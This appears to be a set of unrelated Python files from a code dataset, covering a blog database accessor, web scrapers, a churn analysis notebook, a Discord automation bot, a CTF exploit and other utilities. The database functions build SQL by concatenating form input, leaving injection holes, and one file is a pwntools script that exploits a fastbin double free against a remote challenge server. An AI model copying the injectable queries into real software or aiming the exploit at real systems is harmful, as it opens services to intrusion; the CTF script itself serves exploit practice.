\"'\")[0]\n return result\n\n\ndef add_post(form, heroImage):\n # if a file is there save it into the db\n if heroImage.filename:\n result = query_db(\n \"INSERT INTO post(fileending, title, text, permalink, tags) VALUES('\" +\n heroImage.fileending + \"','\" + form['title'] + \"', '\" + form['text'] + \"', '\" +\n form['permalink'] + \"', '\" + form['tags'] + \"')\")\n # else just save the other form-data\n else:\n result = query_db(\n \"INSERT INTO post(title, text, permalink, tags) VALUES('\" + form['title'] + \"', '\" + form['text'] +\n \"', '\" + form['permalink'] + \"', '\" + form['tags'] + \"')\")\n g.db.commit()\n return result\n\n\ndef update_post(form, heroImage, permalink):\n # if a file is there save it into the db\n if heroImage.filename:\n result = query_db(\"UPDATE post SET fileending='\" + heroImage.fileending + \"',title='\" +\n form['title'] + \"',text='\" + form['text'] + \"',tags='\" + form['tags'] + \"',permalink='\" +\n form['permalink'] + \"' WHERE post.permalink='\" + permalink + \"'\")\n # else just save the other form-data\n else:\n result = query_db(\"UPDATE post SET title='\" + form['title'] + \"',text='\" + form['text'] +\n \"',tags='\" + form['tags'] + \"',permalink='\" + form['permalink'] + \"' WHERE post.permalink='\" + permalink + \"'\")\n g.db.commit()\n return result\n\n\ndef delete_post(permalink):\n result = query_db(\"DELETE FROM post WHERE post.permalink='\" + permalink + \"'\")\n g.db.commit()\n return result\n\n\ndef checkPermalink(permalink):\n return query_db(\"SELECT * FROM post WHERE post.permalink='\" + permalink + \"'\")\n\n\ndef query_db(query, args=(), one=False):\n try:\n cur = g.db.execute(query, args)\n rv = [dict((cur.description[idx][0], value)\n for idx, value in enumerate(row)) for row in cur.fetchall()]\n return (rv[0] if rv else None) if one else rv\n except:\n return {'error': 'query failed: ' + query}\n","sub_path":"db/db_accessor.py","file_name":"db_accessor.py","file_ext":"py","file_size_in_byte":2930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"467109959","text":"'''\n# 获取网页信息\nimport urllib.request\ncontent=urllib.request.urlopen('http://www.fishc.com')\nurl=content.geturl()\nprint(\"the visit web is \",url,end=\" \")\ninfo=content.info()\nprint(\"\\n\",info)\nwith open(\"7月20号urlFile.txt\",'wb') as urlfile:\n urlfile.write(content.read())\nprint(content.read())\n\n# 网上下载一只猫的图片\ncat=urllib.request.urlopen('http://placekitten.com/200/300')\nprint('the visit web is ',cat,end=' ')\nprint(\"\\n\",\"the url is \",cat.geturl())\nprint(cat.info())\nwith open(\"7月20号cat.jpg\",'wb') as catSave:\n catSave.write(cat.read())\nprint(cat.read())\n'''\n# 利用有道词典进行翻译\n# 利用Request 中的header 隐藏自己是python 代码\nimport urllib.request\nimport urllib.parse # 转换data 的模块 \nimport time\nwhile True:\n content=input('请输入你要翻译的内容: ')\n if(content=='stop'):\n break\n url='http://fanyi.youdao.com/translate?smartresult=dict&smartresult=rule'\n # 从network中获得的url 是 url='http://fanyi.youdao.com/translate_o?smartresult=dict&smartresult=rule'\n # 但使用这个会出现error code 错误 所以去掉 _o\n data={}\n data['i']= content\n data['from']='AUTO'\n data['to']='AUTO'\n data['smartresult']='dict'\n data['client']='fanyideskweb'\n data['salt']='15635901740962'\n data['sign']='a71db6b3543a462d4d7c74eb999abb92'\n data['ts']='1563590174096'\n data['bv']='553e64422a39a8b1187e4cd4e341c092'\n data['doctype']='json'\n data['version']='2.1'\n data['keyfrom']='fanyi.web'\n data['action']='FY_BY_REALTlME'\n # data 是我们向网页提交需求的内容\n# 方法一:\n# 
# Method 1:\n# head={}\n# head['User-Agent']='Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Safari/537.36 Core/1.63.5959.400 SLBrowser/10.0.3544.400'\n# data=urllib.parse.urlencode(data).encode('utf-8')\n# req=urllib.request.Request(url,data,head)\n# Method 2:\n    data=urllib.parse.urlencode(data).encode('utf-8')\n    req=urllib.request.Request(url,data)\n    req.add_header('User-Agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Safari/537.36 Core/1.63.5959.400 SLBrowser/10.0.3544.400')\n    transation=urllib.request.urlopen(req)\n    print(transation.read().decode('utf-8'))\n    time.sleep(5)\n# The encoding can be detected as follows\n# import chardet\n# chardet.detect(transation.read())['encoding']\n","sub_path":"7月20号.py","file_name":"7月20号.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
{"seq_id":"580134272","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Summary/Notes\n# \n# ### When you have finished your data visualization exploration, return to this markdown cell and fill it out in preparation for your meeting with the analytics manager, Victor.\n# \n# **Hypothesis 1 findings:** \n# \n# **Hypothesis 2 findings:**\n# \n# **Hypothesis 3 findings:**\n# \n# \n\n# # How to Complete This Notebook\n# \n# This notebook has a skeleton structure to guide your exploration and keep you on track. More details about each task can be found in the project sidebar. Be sure to read the sidebar instructions for each step before writing your code. \n\n# # 1. IMPORT & EXPLORE THE DATA\n# \n# ## 1A. Import Packages & Set Style\n\n# In[2]:\n\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nsns.set()\n\n\n# ## 1B. Import the Data\n# The datasets are stored in the following files:\n# * \"customers.csv\"\n# * \"churn.csv\"\n# \n# These files are in the same folder you are currently working in. \n\n# In[3]:\n\n\ncustomers = pd.read_csv(\"customers.csv\")\n\n\n# In[4]:\n\n\nchurn = pd.read_csv(\"churn.csv\")\n\n\n# ## 1C. Explore Your Data & Identify Structure\n# Add as many code cells as you need to thoroughly explore both DataFrames here.\n\n# In[5]:\n\n\nchurn.info()\nchurn.head(15)\n\n\n# In[6]:\n\n\ncustomers.info()\ncustomers.head(15)\n\n\n# # 2. VISUALIZE THE CUSTOMER DATA\n# \n# ## 2A. Identify Columns Connected to Churn\n\n# In[7]:\n\n\ncustomer_subset = customers[[\"customer_id\", \"age\", \"gender\", \"number_of_referrals\", \"offer\", \"monthly_charge\", \"total_charges\", \"contract\", \"payment_method\", \"under_30\", \"senior_citizen\", \"married\"]]\n\n\n# ## 2B. Visualize the Data\n# \n# ### Plot 1:\n\n# In[8]:\n\n\ngender_dict = dict(customer_subset.gender.value_counts())\nx_labels = gender_dict.keys()\ny_labels = gender_dict.values()\nplt.bar(x_labels, y_labels)\nplt.xlabel(\"Gender\")\nplt.ylabel(\"Frequency\")\nplt.title(\"Gender Breakdown in the Customer CSV\")\n\n\n# **Plot description:** \n# The ratio of males to females is almost equal. 
There are 3554 males and 3488 females\n\n# ### Plot 2:\n\n# In[9]:\n\n\nage_dict = dict(customer_subset.age.value_counts())\nprint(age_dict)\nprint(min(age_dict.values()))\nprint(min(age_dict.keys()))\nprint(max(age_dict.keys()))\nprint(max(age_dict.values()))\nx_labels = age_dict.keys()\ny_labels = age_dict.values()\nplt.bar(x_labels, y_labels)\nplt.xlabel(\"Ages\")\nplt.ylabel(\"Frequency\")\nplt.title(\"Age Breakdown in the Customer CSV\")\n\n\n# **Plot description:** The ages included in the CSV are widely dispersed, with the most popular age being 42 and the least popular age being 72. The youngest age in the CSV is 19, and the oldest is 80.\n\n# ### adding a few more plots...\n\n# In[25]:\n\n\nsns.boxplot(\n x=\"offer\",\n y=\"total_charges\",\n hue=\"offer\",\n data= customer_subset\n)\n\n\n# ### boxplot\n# \n# Offer E is the cheapest, with total charges around $1500$. Offer A is the most expensive, with total charges reaching past $8000$!\n\n# In[27]:\n\n\nsns.boxplot(\n x=\"offer\",\n y=\"total_charges\",\n hue=\"gender\",\n data= customer_subset\n)\n\n\n# ### grouped boxplot\n# This boxplot compares total charges vs. the available offers, and the boxplot is grouped by gender. Overall, it seems like men and women pay very comparable rates. In Offer E, B, and A, females pay a bit more, and in C males pay more than females in total charges. In offer D, the results are nearly exact.\n\n# In[31]:\n\n\nsns.displot(\n customer_subset, x=\"monthly_charge\", col=\"offer\", row=\"gender\",\n binwidth=3, height=3, facet_kws=dict(margin_titles=True),\n)\n\n\n# ### Distplot\n# This plot provides a more granular overview of what males and females are paying on a monthly basis. The columns are grouped by Offers, and the rows are grouped by Gender. It is interesting that, at each offer level, both males and females tend to pay the lowest monthly charge.\n\n# adding a few more plots...\n\n# In[35]:\n\n\nsns.displot(\n customer_subset, x=\"monthly_charge\", col=\"contract\", row=\"gender\",\n binwidth=3, height=3, facet_kws=dict(margin_titles=True),\n)\n\n\n# In[51]:\n\n\nsns.displot(\n customer_subset, x=\"monthly_charge\", col=\"contract\", row=\"senior_citizen\",\n binwidth=3, height=3, facet_kws=dict(margin_titles=True),\n)\n\n\n# In[57]:\n\n\nsns.displot(\n customer_subset, x=\"payment_method\", col=\"contract\", row=\"senior_citizen\",\n binwidth=10, height=5, facet_kws=dict(margin_titles=True),\n)\n\n\n# # 3. JOIN THE DATAFRAMES\n\n# In[60]:\n\n\nchurn.customer_id = churn.customer_id.apply(lambda id_num: \"\".join(id_num.split(\"-\")))\nmerged_df = pd.merge(customer_subset, churn, how='inner')\n\n\n# # 4. EXPLORE CHURN HYPOTHESES\n\n# ### 1. 
Question: Do younger customers churn at a higher rate?\n# **Hypothesis:** Younger customers are always looking for new technology and better deals, while older customers might be less inclined to switch companies from what they are familiar with.\n\n# In[79]:\n\n\nmerged_df[\"churn_label\"].value_counts()\n\nsns.boxplot(\n    x=\"churn_label\",\n    y=\"age\",\n    data=merged_df\n)\n\n\n# **Plot Description:** The median age of people with a churn label of 'Yes' is 50 and the max is 65, while the median age of people with a churn label of 'No' is around 45 with a higher max; since no churner is older than 65, the oldest customers (up to 80) all fall in the 'No' group.\n\n# In[82]:\n\n\nsns.displot(\n    merged_df[merged_df[\"churn_label\"] == \"No\"],\n    x=\"age\",\n    hue=\"senior_citizen\"\n)\n\n\n# In[83]:\n\n\nsns.displot(\n    merged_df[merged_df[\"churn_label\"] == \"Yes\"],\n    x=\"age\",\n    hue=\"senior_citizen\"\n)\n\n\n# **Plot Description:** These two plots compare the frequency of the ages of people whose churn labels were \"Yes\" and \"No\". Interestingly, senior citizens are slightly more likely to churn than not (the count is ~140 for 65-80 year olds with 'Yes', versus ~125 for 'No'). Alternatively, non-senior citizens are much more likely to not churn (except for ages 50 and 60, the frequency of those with a churn label of \"No\" is greater than 250).\n\n# ### 2. Question: -- create your own --\n# **Hypothesis:** \n\n# In[ ]:\n\n\n\n\n\n# **Plot Description:**\n\n# In[ ]:\n\n\n\n\n\n# **Plot Description:**\n\n# ### 3. Question: -- create your own --\n# **Hypothesis:**\n\n# In[ ]:\n\n\n\n\n\n# **Plot Description:**\n\n# In[ ]:\n\n\n\n\n\n# **Plot Description:**\n","sub_path":"P2P2/Project 2 Part 2.py","file_name":"Project 2 Part 2.py","file_ext":"py","file_size_in_byte":6118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
{"seq_id":"545993997","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException, StaleElementReferenceException, TimeoutException\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as ec\nfrom selenium.webdriver.common.by import By\nimport time\nfrom random import randint\nfrom playsound import playsound\n\n\n# In[5]:\n\n\ndef login():\n\tpath = '/Users/inika/Selenium Webdrivers/chromedriver'\n\tdriver = webdriver.Chrome(path)\n\n\tusername = \" \"\n\tpassword = \" \"\n\n\tdriver.get('https://discord.com')\n\twait = WebDriverWait(driver, 10)\n\ttime.sleep(3)\n\t\n
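\t# Up to three login attempts; the Discord login form can be slow to appear.\n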
Retrying...\")\n\t\t\ttime.sleep(2)\n\t\t\tcontinue\n\n\treturn driver,wait\n\ndef goToServer(server):\n\tservers = wait.until(ec.presence_of_all_elements_located((By.XPATH,\"//div[@class = 'listItem-2P_4kh']\")))[2:-4]\n\tfor s in servers:\n\t\ta = s.find_element_by_tag_name('a')\n\t\ttry:\n\t\t\tif a.get_attribute(\"aria-label\")==server:\n\t\t\t\ta.click()\n\t\t\t\tbreak\n\t\texcept StaleElementReferenceException:\n\t\t\tprint(\"No such Server\")\n\t\t\t\ndef goToChannel(channel):\n\tchannels = wait.until(ec.presence_of_all_elements_located((By.CLASS_NAME,\"name-3_Dsmg\")))\n\tfor c in channels:\n\t\tif c.text == channel.lower():\n\t\t\tc.click()\n\t\t\t\ndef sendMessage(message): #sends message and for bot messages, checks if it triggered an event\n\tcurrent_channel = driver.find_element_by_xpath(\"//h3[@class = 'title-29uC1r base-1x0h_U size16-1P40sf']\").text\n\ttextbox = wait.until(ec.presence_of_element_located((By.XPATH,'//div[@aria-label = \"Message #'+current_channel+'\"]')))\n\ttextbox.send_keys(message)\n\ttextbox.send_keys(Keys.RETURN)\n\tif 'pls' in message and 'why my pls rich' not in message:\n\t\ttime.sleep(1)\n\t\tevents()\n\t\ndef clear(n=10):\n\tn = len(driver.find_elements_by_xpath(\"//div[@class = 'markup-2BOw-j messageContent-2qWWxC']\"))\n\tif n>0:\n\t\t# while(n!=0):\n\t\tsendMessage('!clear '+str(n))\n\t\ttime.sleep(4)\n\t\t\t# n = len(driver.find_elements_by_xpath(\"//div[@class = 'markup-2BOw-j messageContent-2qWWxC']\"))\n\ndef frogSearch(safe):\n\tsendMessage('pls dep all')\n\tclear()\n\tsendMessage('pls search')\n\tunsafes = ['sewer','dumpster','car','street','hospital','dog']\n\tgood_places = ['dresser','bed','mailbox','couch']\n\tplaces = [i.text for i in driver.find_elements_by_xpath(\"//div[@class = 'markup-2BOw-j messageContent-2qWWxC']//code\")]\n\tfor i in unsafes:\n\t\tif i in places:\n\t\t\tplaces.remove(i)\n\tif len(places)!=0:\n\t\ti=-1\n\t\tfor p in good_places:\n\t\t\tif p in places:\n\t\t\t\ti = places.index(p)\n\t\t\t\tbreak\n\t\tif i<0:\n\t\t\trandint(0,len(places)-1)\n\t\tsendMessage(places[i])\n\telse:\n\t\tsendMessage('pls pet pat')\n\ttime.sleep(1)\n\t#result\n\tmsgs = driver.find_elements_by_xpath(\"//div[@class = 'markup-2BOw-j messageContent-2qWWxC']\")\n\tfor msg in msgs:\n\t\tif 'area searched' in msg.text.lower():\n\t\t\tprint(\"Result: \",msg.text.split('\\n')[-1])\n\ndef postMeme():\n\tmemes = ['n','e','r','d']\n\tsendMessage('pls pm')\n\tsendMessage(memes[randint(0,len(memes)-1)])\n\tevents()\n\ttime.sleep(1)\n\tmsgs = driver.find_elements_by_xpath(\"//div[@class = 'markup-2BOw-j messageContent-2qWWxC']\")\n\tfor msg in msgs:\n\t\tif 'your meme' in msg.text.lower():\n\t\t\tprint(\"Result: \",msg.text)\n\t\t\tif 'laptop is broken' in msg.text.lower():\n\t\t\t\tsendMessage('pls withdraw 1000')\n\t\t\t\tsendMessage('pls buy laptop')\n\t\t\t\tprint(\"Bought laptop for 1000 coin\")\n\ndef fish():\n\tsendMessage('pls fish')\n\ttime.sleep(1)\n\tmsgs = driver.find_elements_by_xpath(\"//div[@class = 'markup-2BOw-j messageContent-2qWWxC']\")\n\tfor msg in msgs:\n\t\tif 'fish is too strong' in msg.text.lower():\n\t\t\tt = msg.find_element_by_xpath(\"./code\").text\n\t\t\tsendMessage(t)\n\t\t\tprint(msg.text)\n\t\t\tplaysound('/Users/inika/Downloads/notify.mp3')\n\t\t\tprint(\"Typed: \",t)\n\t\t\tmsgs = driver.find_elements_by_xpath(\"//div[@class = 'markup-2BOw-j messageContent-2qWWxC']\")\n\t\t\t\n\t#result\n\tfor msg in msgs:\n\t\tif 'cast out your line' in msg.text.lower():\n\t\t\tprint(\"Result: \",msg.text.split('\\n')[0])\n\ndef 
def events():\n\tevent = False\n\ttry:\n\t\ttime.sleep(2)\n\t\tli = driver.find_elements_by_xpath(\"//div[@class = 'markup-2BOw-j messageContent-2qWWxC']\")\n\t\tfor i in range(len(li)):\n\t\t\tx = li[i].text.lower()\n\t\t\tif (\"event \" in x or \"common event\" in x or \"rare event\" in x) and \"lookout for \" not in x:\n\t\t\t\tevent = True\n\t\t\t\tplaysound('/Users/inika/Downloads/notify.mp3')\n\t\t\t\tbreak\n\n\t\tif event:\n\t\t\tevent1=li[i]\n\t\t\tevent2=li[i+1]\n\t\t\tprint(event1.text)\n\t\t\tprint(event2.text)\n\t\t\tresponse = event2.find_element_by_xpath(\".//code\").text\n\t\t\tsendMessage(response)\n\t\t\t\n\t\t\tif \"hit\" in event2.text or 'boss' in event2.text.lower():\n\t\t\t\tfor _ in range(7):\n\t\t\t\t\tsendMessage(response) \n\n\t\t\twait_long = WebDriverWait(driver, 40)\n\t\t\ttry:\n\t\t\t\tmsgs = wait_long.until(ec.presence_of_all_elements_located((By.XPATH,\"//div[@class = 'embedFieldValue-nELq2s']\")))\n\t\t\texcept TimeoutException:\n\t\t\t\tclear()\n\t\t\t\treturn\n\t\t\tfor msg in msgs:\n\t\t\t\tif 'Morticia' in msg.text:\n\t\t\t\t\tprint(\"Result: \",msg.text) \n\t\t\t\t\tclear() \n\t\t\t\t\n\texcept NoSuchElementException:\n\t\tpass\n\t\t\n\texcept StaleElementReferenceException:\n\t\tpass\n\n\ndef bot():\n\tclear(100)\n\tprefix = 'pls '\n\tcommands = [prefix+c for c in ['beg','fish','pm','search']]\n\tpetcommands = [prefix+'pet '+c for c in ['feed','wash','play','pat']] \n\twhile True:\n\t\tfor com in commands:\n\t\t\tclear()\n\t\t\tif 'pm' in com:\n\t\t\t\tpostMeme()\n\t\t\telif 'search' in com:\n\t\t\t\tfrogSearch(safe = True)\n\t\t\telif 'fish' in com:\n\t\t\t\tfish()\n\t\t\telse:\n\t\t\t\tsendMessage(com) \n\t\ttime.sleep(7)\n\n\n# In[ ]:\n\n\ndriver,wait = login()\ngoToServer('sandcastle')\ngoToChannel('spam')\nbot()\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"dankmemerbot.py","file_name":"dankmemerbot.py","file_ext":"py","file_size_in_byte":6042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
{"seq_id":"604362120","text":"from pwn import *\n\ndef free(index):\n    global r\n    raw_input('debug free {}'.format(index))\n    r.recvuntil('input:')\n    r.sendline('0')\n    r.recvuntil('x =')\n    r.sendline(str(index))\n\ndef malloc(index):\n    global r\n    raw_input('debug malloc {}'.format(index))\n    r.recvuntil('input:')\n    r.sendline('1')\n    r.recvuntil('x =')\n    r.sendline(str(index))\n\ndef string(index, data):\n    global r\n    raw_input('debug string {} {}'.format(index, data))\n    r.recvuntil('input:')\n    r.sendline('2')\n    r.recvuntil('x =')\n    r.sendline(str(index))\n    r.recvuntil('string =')\n    r.sendline(data)\n\ndef show(index):\n    global r\n    raw_input('debug show {}'.format(index))\n    r.recvuntil('input:')\n    r.sendline('2')\n    r.recvuntil('x =')\n    r.sendline(str(index))\n\n#r = process('forging_chunk')\nr = remote('140.110.112.77', 9001)\nraw_input('debug:')\nvictim = int(r.recvline().split(':')[1].strip()[2:], 16)\nsize = int(r.recvline().split(':')[1].strip()[2:], 16)\nprint('victim: {}, size: {}'.format(hex(victim), hex(size)))\n\nmalloc(0)\nstring(0, 'a' * 8)\nmalloc(1)\nstring(1, 'b' * 8)\nfree(0)\nfree(1)\nfree(0)\n
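# fastbin double free: the next malloc returns the twice-freed chunk, whose fd is then\n# overwritten so that a later malloc hands back a forged chunk at 'victim'\n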
malloc(0)\nstring(0, p64(victim - 0x10))\nmalloc(0)\nmalloc(0)\nmalloc(0)\nstring(0, p64(0xdeadbeef))\nr.recvuntil('input:')\nr.sendline('5')\nr.interactive()\n","sub_path":"Games/pwnctf/Pwno/forging_chunk/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
{"seq_id":"261193653","text":"def chocolate(index):\n\tif(index == []):\n\t\treturn 0\n\t\t\n\tif(len(index) == 1):\n\t\treturn 1\n\tans = 1\n\n\tfor i in range(len(index) - 1):\n\t\tans = ans * (index[i + 1] - index[i])\n\n\treturn ans\n\nif(__name__ == \"__main__\"):\n\tcnt = int(raw_input())\n\tl = [tmp for tmp in raw_input().split(' ')]\n\tindex = []\n\tfor i, v in enumerate(l):\n\t\tif(v == \"1\"):  # cells containing a nut are marked with 1\n\t\t\tindex.append(i)\n\tprint(chocolate(index))","sub_path":"online_judge/codeforces/617, Codeforces Round #340/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
{"seq_id":"284301200","text":"#A8\r\ntext_1 = \"This sentence has 4 apples 5 pears and 8 bananas\"\r\ntext_2 = 'this second sentence has 9 cherries 3 watermelons'\r\ntext_1=text_1.split(' ')\r\ntext_2=text_2.split(' ')\r\nsayi_1=text_1[3]+text_1[5]+text_1[8]\r\nsayi_2=text_2[4]+text_2[6]\r\nsayi_1=int(sayi_1)\r\nsayi_2=int(sayi_2)\r\nprint(sayi_1+sayi_2)\r\n","sub_path":"1.Week/A8.py","file_name":"A8.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
{"seq_id":"401051806","text":"import open_bci_v3\nimport time\nimport filters\nimport time\nimport csv\nimport numpy as np\nimport open_bci_v3 as bci\nimport udp_server\n\nclass Data_Buffer():\n\n\tdef __init__(self):\n\t\tself.filt = filters.Filters()\n\t\tself.data_buffer = []\n\t\tself.count = 0\n\t\tself.udp_packet = []\n\n\tdef buffer(self,sample):\n\t\tcount = 0;\n\t\tif sample and ((count%8) == 0):\n\t\t\tEEG = []\n\t\t\tEEG = self.filt.filter_data(sample.channel_data)\n\t\t\tsend = []\n\n\t\t\tif (EEG is not None) and (count%4==0):\n\t\t\t\tuv = EEG[0]\n\t\t\t\tfft = EEG[1]\n\t\t\t\tfft1 = fft[0,10:42]\n\t\t\t\tfft2 = fft[9,10:42]\n\n\t\t\t\tfor chan in uv:\n\t\t\t\t\tsend.append(chan[0])\n\t\t\t\tfor pt in fft1:\n\t\t\t\t\tsend.append(pt)\n\t\t\t\tfor pt in fft2:\n\t\t\t\t\tsend.append(pt)\n\t\t\t\tprint(np.shape(send))\n\t\t\t\tprint(send)\n\t\t\t\tudp.receive(send)\n\n\t\t# DATA FORMAT\n\t\t# FIRST 18 values are from the raw voltage\n\t\t# 0-5: subj 1 eeg\n\t\t# 6: subj 1 ecg\n\t\t# 7: null\n\t\t# 8-13: subj2 eeg\n\t\t# 14: subj2 ecg\n\t\t# 15: null\n\t\t# 16-2080: channels 0-5 and 8-13 fft data (129 points per channel)\n\t\tself.count = self.count+1\n
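\n# NOTE: buffer() sends over the module-level 'udp' server that main() below creates.\n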
def main():\n\n\n\tglobal udp\n\tudp = udp_server.UDPServer()\n\n\tdb = Data_Buffer()\n\tboard = bci.OpenBCIBoard(port='/dev/ttyUSB0', send=db)\n\tboard.start_streaming(db.buffer)\n\n\t################################\n\t#\n\t# SIMULATION VERSION\n\t#\n\n\t# channel_data = []\n\t# with open('aaron_test_data/latest_trials/trial2.txt', 'r') as file:\n\t# \treader = csv.reader(file, delimiter=',')\n\t# \t# next(file)\n\t# \tfor j,line in enumerate(reader):\n\t# \t\tline = [x.replace(' ','') for x in line]\n\t# \t\tchannel_data.append(line) #list\n\t# \t\tprint(line)\n\n\n\n\t# print(len(channel_data))\n\t# last_time_of_program = 0\n\t# start = time.time()\n\t# for i,sample in enumerate(channel_data):\n\t# \tend = time.time()\n\t# \t#Maintain the 250 Hz sample rate when reading a file\n\t# \t#Wait for a period of time if the program runs faster than real time\n\t# \ttime_of_recording = i/250\n\t# \ttime_of_program = end-start\n\t# \tprint('i/250 (time of recording)', time_of_recording)\n\t# \tprint('comp timer (time of program)', time_of_program)\n\t# \tif time_of_recording > time_of_program:\n\t# \t\t# print('PAUSING ', time_of_recording-time_of_program, ' Seconds')\n\t# \t\ttime.sleep(time_of_recording-time_of_program)\n\t# \tdb.buffer(sample)\n\n\nif __name__ == '__main__':\n\tmain()\n\n","sub_path":"data_buffer.py","file_name":"data_buffer.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
{"seq_id":"434326197","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass ManagedClusterPoolUpgradeProfile(Model):\n    \"\"\"The list of available upgrade versions.\n\n    All required parameters must be populated in order to send to Azure.\n\n    :param kubernetes_version: Required. Kubernetes version (major, minor,\n     patch).\n    :type kubernetes_version: str\n    :param name: Pool name.\n    :type name: str\n    :param os_type: Required. OsType to be used to specify os type. Choose\n     from Linux and Windows. Default to Linux. Possible values include:\n     'Linux', 'Windows'. Default value: \"Linux\" .\n    :type os_type: str or\n     ~azure.mgmt.containerservice.v2019_02_01.models.OSType\n    :param upgrades: List of orchestrator types and versions available for\n     upgrade.\n    :type upgrades: list[str]\n    \"\"\"\n\n    _validation = {\n        'kubernetes_version': {'required': True},\n        'os_type': {'required': True},\n    }\n\n    _attribute_map = {\n        'kubernetes_version': {'key': 'kubernetesVersion', 'type': 'str'},\n        'name': {'key': 'name', 'type': 'str'},\n        'os_type': {'key': 'osType', 'type': 'str'},\n        'upgrades': {'key': 'upgrades', 'type': '[str]'},\n    }\n\n    def __init__(self, *, kubernetes_version: str, name: str=None, os_type=\"Linux\", upgrades=None, **kwargs) -> None:\n        super(ManagedClusterPoolUpgradeProfile, self).__init__(**kwargs)\n        self.kubernetes_version = kubernetes_version\n        self.name = name\n        self.os_type = os_type\n        self.upgrades = upgrades\n","sub_path":"src/aks-preview/azext_aks_preview/vendored_sdks/azure_mgmt_preview_aks/v2019_02_01/models/managed_cluster_pool_upgrade_profile_py3.py","file_name":"managed_cluster_pool_upgrade_profile_py3.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
{"seq_id":"648581285","text":"# -*- coding: utf-8 -*-\nfrom feedvest.models.opml import export_opml\nfrom feedvest.tests.helpers import assert_xml_equals\n\n\nclass TestExportOPML:\n\n    def test_no_subscriptions(self):\n        expected = b\"\"\"\n            \n            \n                Subscriptions\n            \n            \n        \"\"\"\n\n        assert_xml_equals(export_opml([]), expected)\n\n    def test_one_subscription(self, subscription):\n        feed = subscription.feed\n        feed.title = u'タイトル'\n\n        expected = u\"\"\"\n            \n            \n                Subscriptions\n            \n            \n                \n            \n        \"\"\".format(feed).encode('utf-8')\n\n        assert_xml_equals(export_opml([subscription]), expected)\n","sub_path":"feedvest/tests/api/models/test_opml.py","file_name":"test_opml.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
{"seq_id":"310871966","text":"import random\n\nq = random.randint(1, 20)\ncnt = 0\n
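# The player gets four guesses; cnt counts how many have been used.\n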
while cnt <= 4:\n    if cnt != 4:\n        print(\"You have\", 4 - cnt, \"chances left. Guess a number between 1 and 20:\", sep=' ')\n        cnt += 1\n        a = int(input())\n        if a == q:\n            print(\"Congratulations! You guessed the number in\", cnt, \"tries.\", sep=' ')\n            break\n        elif a > q:\n            print(\"Down\")\n        else:\n            print(\"Up\")\n    else:\n        print(\"Too bad. The answer was\", q, sep=' ')\n        break\n","sub_path":"6-1.py","file_name":"6-1.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
{"seq_id":"443900338","text":"import time\nfrom mpi4py import MPI\nimport pickle\nimport timeit\nimport msgpack\nimport sys\nfrom test_pb2 import BunchOfTestDicts, TestDict, Pair\n\ndef writePB():\n    bOTD = BunchOfTestDicts()\n    for thisDict in realStuff:\n        tD = bOTD.dicts.add()\n        for k, v in thisDict.items():\n            pair = tD.pairs.add()\n            pair.key = k\n            pair.value = v\n\n    with open('realstuff.pb', 'wb') as f:\n        f.write(bOTD.SerializeToString())\n\ndef readPB():\n    bOTD = BunchOfTestDicts()\n    with open('realstuff.pb', 'rb') as f:\n        bOTD.ParseFromString(f.read())\n    thisDictList = [{thisPair.key: thisPair.value\n                     for thisPair in thisBufferedDict.pairs}\n                    for thisBufferedDict in bOTD.dicts]\n    return thisDictList\n\ndef writeReadPB():\n    bOTD = BunchOfTestDicts()\n    for thisDict in realStuff:\n        tD = bOTD.dicts.add()\n        for k, v in thisDict.items():\n            pair = tD.pairs.add()\n            pair.key = k\n            pair.value = v\n    #serializedPB = bOTD.SerializeToString()\n    #print 'serialized PB length: %s'%len(serializedPB)\n    #newBOTD = BunchOfTestDicts()\n    #newBOTD.ParseFromString(serializedPB)\n    newBOTD = bOTD\n    thisDictList = [{thisPair.key: thisPair.value\n                     for thisPair in thisBufferedDict.pairs}\n                    for thisBufferedDict in newBOTD.dicts]\n    return thisDictList\n\n\nwith open('realstuff.pkl', 'rb') as f:\n    realStuff = pickle.load(f)\n\nsetupStatement=\"\"\"\\\nfrom __main__ import writePB, readPB, writeReadPB, realStuff\n\"\"\"\n\n#print ('write: %s' % timeit.timeit(\"writePB()\", setup=setupStatement, number=1))\n#print ('read: %s' % timeit.timeit(\"readPB()\", setup=setupStatement, number=1))\nprint ('writeRead: %s' % timeit.timeit(\"writeReadPB()\", setup=setupStatement, 